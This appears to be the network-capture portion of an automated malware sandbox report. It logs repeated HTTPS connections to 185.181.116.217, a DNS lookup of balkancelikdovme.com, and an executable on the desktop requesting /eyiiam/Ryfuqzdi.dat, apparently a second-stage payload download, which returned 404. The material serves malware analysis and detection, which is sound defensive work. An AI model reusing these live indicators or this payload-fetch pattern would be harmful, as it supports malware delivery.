      Jan 10, 2025 23:07:29.997230053 CET44350181185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:29.997399092 CET44350181185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:29.997482061 CET50181443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:29.997868061 CET50181443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:29.998366117 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:29.998408079 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:29.998486996 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:29.998714924 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:29.998730898 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.598586082 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.600363016 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.600404024 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.872005939 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.872169971 CET44350182185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.872230053 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.872567892 CET50182443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.873071909 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.873155117 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:30.873245001 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.873553038 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:30.873593092 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.495640039 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.497194052 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.497225046 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.772874117 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.773046970 CET44350183185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.773118973 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.773478985 CET50183443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.774115086 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.774224997 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:31.774331093 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.774533033 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:31.774570942 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.386424065 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.387931108 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.387948036 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.662637949 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.662698984 CET44350184185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.662749052 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.663223982 CET50184443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.663615942 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.663727045 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:32.663815022 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.664015055 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:32.664048910 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.251817942 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.253274918 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.253309965 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.523370028 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.523453951 CET44350185185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.523782969 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.562659025 CET50185443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.563246012 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.563319921 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:33.565383911 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.566535950 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:33.566554070 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.176443100 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.178106070 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.178133965 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.453419924 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.453497887 CET44350186185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.453560114 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.454057932 CET50186443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.454839945 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.454891920 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:34.454978943 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.455210924 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:34.455223083 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.055960894 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.057581902 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.057657957 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.331115961 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.331192970 CET44350187185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.331260920 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.331655979 CET50187443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.332262993 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.332313061 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.332395077 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.332595110 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.332604885 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.923513889 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:35.925026894 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:35.925040007 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.195637941 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.195715904 CET44350188185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.195892096 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.199393034 CET50188443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.203677893 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.203731060 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.203814983 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.204044104 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.204056978 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.805108070 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:36.806925058 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:36.806962013 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.078252077 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.078531981 CET44350189185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.078587055 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.078883886 CET50189443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.079385996 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.079425097 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.079478025 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.079802036 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.079809904 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.679347038 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.680783033 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.680798054 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.953764915 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.953830957 CET44350190185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.953923941 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.954379082 CET50190443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.954879999 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.954931021 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:37.955002069 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.955370903 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:37.955385923 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.559372902 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.560758114 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.560784101 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.832556009 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.832631111 CET44350191185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.832706928 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.834964037 CET50191443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.841651917 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.841703892 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:38.841789961 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.842014074 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:38.842031956 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.442163944 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.444056988 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.444088936 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.717955112 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.718043089 CET44350192185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.718159914 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.718620062 CET50192443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.719106913 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.719161034 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:39.719270945 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.719461918 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:39.719475985 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.365978003 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.368043900 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.368083954 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.657537937 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.657665014 CET44350193185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.657780886 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.658256054 CET50193443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.658807993 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.658915043 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:40.662925005 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.663125992 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:40.663160086 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.272649050 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.274266005 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.274336100 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.559566975 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.559644938 CET44350194185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.559706926 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.560091019 CET50194443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.560537100 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.560595989 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:41.560676098 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.560852051 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:41.560872078 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.175436020 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.176975012 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.177002907 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.477329016 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.477406025 CET44350195185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.477492094 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.477932930 CET50195443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.478420973 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.478455067 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:42.478523970 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.478734970 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:42.478750944 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.109015942 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.110435009 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.110471010 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.384623051 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.384722948 CET44350196185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.384805918 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.385320902 CET50196443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.385900974 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.385952950 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:43.386027098 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.386234999 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:43.386245966 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.001275063 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.002701998 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.002717972 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.277337074 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.277502060 CET44350197185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.277558088 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.277848959 CET50197443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.278512955 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.278564930 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.278625965 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.278858900 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.278876066 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.897006035 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:44.900207996 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:44.900238991 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:45.174695015 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:45.174787045 CET44350198185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:45.174896955 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:45.191003084 CET50198443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:45.191690922 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:45.191736937 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:45.191824913 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:45.192182064 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:45.192193031 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.003515005 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.005887032 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.005908966 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.279419899 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.279510975 CET44350199185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.279612064 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.280016899 CET50199443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.280484915 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.280531883 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.280602932 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.280791998 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.280814886 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.883338928 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:46.884845972 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:46.884877920 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.156151056 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.156223059 CET44350200185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.156337023 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.156776905 CET50200443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.157264948 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.157309055 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.157427073 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.157629013 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.157645941 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.753231049 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:47.754657030 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:47.754673004 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.024009943 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.024100065 CET44350201185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.024159908 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.024600983 CET50201443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.025089979 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.025134087 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.025207996 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.026318073 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.026328087 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.620876074 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.622616053 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.622637033 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.893177986 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.893348932 CET44350202185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.893418074 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.893888950 CET50202443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.894385099 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.894439936 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:48.894510031 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.894742012 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:48.894761086 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.507204056 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.509121895 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.509138107 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.783540010 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.783710957 CET44350203185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.783766031 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.784580946 CET50203443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.785895109 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.785983086 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:49.786107063 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.786395073 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:49.786432028 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.406121969 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.407732010 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.407824039 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.683454990 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.683523893 CET44350204185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.683701992 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.683960915 CET50204443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.684452057 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.684494972 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:50.684655905 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.684860945 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:50.684889078 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.301716089 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.303167105 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.303190947 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.579288960 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.579370022 CET44350205185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.579436064 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.580142975 CET50205443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.580687046 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.580796957 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:51.581119061 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.581398010 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:51.581434011 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.202341080 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.204590082 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.204665899 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.478431940 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.478502035 CET44350206185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.478642941 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.479130983 CET50206443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.479758024 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.479806900 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:52.481064081 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.481410980 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:52.481424093 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.080488920 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.082655907 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.082679987 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.352679968 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.352778912 CET44350207185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.352852106 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.353391886 CET50207443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.354022980 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.354074955 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.354419947 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.354645967 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:53.354665995 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:53.984373093 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.028135061 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.081231117 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.081262112 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.259793997 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.259886026 CET44350208185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.259955883 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.260656118 CET50208443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.261055946 CET50209443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.261110067 CET44350209185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.261184931 CET50209443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.261446953 CET50209443192.168.2.4185.181.116.217
      Jan 10, 2025 23:07:54.261460066 CET44350209185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.862844944 CET44350209185.181.116.217192.168.2.4
      Jan 10, 2025 23:07:54.903497934 CET50209443192.168.2.4185.181.116.217
      TimestampSource PortDest PortSource IPDest IP
      Jan 10, 2025 23:04:48.744710922 CET6494253192.168.2.41.1.1.1
      Jan 10, 2025 23:04:48.782073021 CET53649421.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jan 10, 2025 23:04:48.744710922 CET192.168.2.41.1.1.10x5845Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 10, 2025 23:04:48.782073021 CET1.1.1.1192.168.2.40x5845No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
      • balkancelikdovme.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449730185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:49 UTC89OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2025-01-10 22:04:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:49 GMT
      vary: User-Agent
